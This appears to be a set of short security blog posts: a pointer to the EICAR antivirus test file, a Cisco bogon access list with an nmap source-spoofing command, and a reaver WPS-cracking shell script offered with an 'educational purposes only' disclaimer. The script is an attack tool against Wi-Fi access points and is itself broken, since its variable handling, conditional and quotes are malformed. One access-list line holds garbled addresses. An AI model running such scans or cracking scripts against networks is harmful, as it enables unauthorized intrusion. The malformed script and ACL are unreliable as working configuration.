Hey All see below on how to monitor Bandwith traffic with Untangle !
Every wondered if you antivirus is working ?
Ever wanted to test the real-time protection of your antivirus and its effectiveness of threat detection ?
Well there is a free online resource you can use to download different types if files such as .zip files .com or .html file that should set off you antivirus and flag it as a virus although this is not 100% fool proof as no antivirus or security measure is 100% but this will definitely test against the most basic of virus activity you even have the option of downloading the file via HTTP and HTTPS to see how your AV reacts
The site is located at http://www.eicar.org/85-0-Download.html
All in all this is a very useful tool for testing
Until next time stay secure !
Here is a little snippet of information on the importance of applying an access list to your edge router to IP blocks that are listed on the bogon list
What is the bogon list?
The bogon list is a list of ip subnets that are either invalid non routable ip blocks such as 192.168.0.0 or ip blocks that are not assigned
it is important to block these ip blocks from accessing your network as it eliminates the chance of a hacker spoofing his/her source ip address for an internal ip address for instance with nmap we can issue the following command to spoof our source ip address when scanning a target
nmap -S 192.168.0.1 192.168.1.1 -e eth0 -PN
now if you did not have a access list to block incoming traffic from this non routerable ip 192.168.0.1 the spoofed ip packet will then be able to pass through your router
here is a current bogon list that can be copied and pasted into a Cisco IOS device
copy from below the line
no access-list 101
access-list 101 deny ip 0.0.0.0 0.255.255.255 any
access-list 101 deny ip 10.0.0.0 0.255.255.255 any
access-list 101 deny ip 100.64.0.0 0.63.255.255 any
access-list 101 deny ip 127.0.0.0 0.255.255.255 any
access-list 101 deny ip 169.254.0.0 0.0.255.255 any
access-list 101 deny ip 172.16.0.0 0.15.255.255 any
access-list 101 deny ip 192.0.0.0 0.0.0.255 any
access-list 101 deny ip 192.0.2.0 0.0.0.255 any
access-list 101 deny ip 192.168.0.0 0.0.255.255 any
access-list 101 deny ip 198.18.0.0 0.1.255.255 any
access-list 101 deny ip 198.51.100.0 0.0.0.255 any
access-list 101 deny ip 203.0.113.0 0.0.0.255 any
access-list 101 deny ip 188.8.131.52 184.108.40.206 any
access-list 101 permit ip any any
ip access-group 101 in
The above access list will block all the ip blocks on the bogon list
this small step should be apart of network security best practices
for any sized network its simple to apply and can stop many types of attacks
Till next time stay secure !
Here is a simple script to automate and explorer the reaver exploit and test your
Wi-Fi access points againts reaver
The below assumes you have reavers installed !
Please Note: This information and script is for educational purposes only
i am not respoisble for any actions taken on your part !
to use this script type in the following command in your terminal
sudo nano filename.sh
copy and paste the below script
ctrl-o then hit enter
ctrl-x then hit enter
chmod +x filename.sh
To run this script in your terminal type ./filename.sh
Start of script
echo “Its cracking time !!!!!!”
sudo airmon-ng start wlan0
sudo airmon-ng start mon0
sudo airodump-ng mon0
echo “Enter the bssid ”
sudo reaver -i mon0 -b $bssid -vv
if $bssid =” no ”
sudo airmon-ng stop mon0
sudo airmon-ng stop mon1
sudo airmon-ng stop mon2
sudo airmon-ng stop mon3
echo “Good bye sir ”